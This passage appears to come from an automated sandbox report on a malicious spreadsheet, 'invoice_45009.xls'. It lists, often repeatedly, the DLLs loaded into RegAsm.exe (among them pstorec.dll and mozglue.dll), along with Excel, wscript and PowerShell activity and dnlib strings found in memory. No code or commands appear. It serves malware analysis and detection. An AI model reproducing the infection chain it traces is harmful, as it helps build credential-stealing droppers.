                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: shcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pstorec.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                    Source: invoice_45009.xlsStatic file information: File size 1095168 > 1048576
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000010.00000002.486432226.0000000002260000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.486203439.0000000000329000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000010.00000002.486432226.0000000002260000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.486203439.0000000000329000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.pdb source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000010.00000002.490190691.0000000006350000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000010.00000002.487113772.0000000004059000.00000004.00000800.00020000.00000000.sdmp
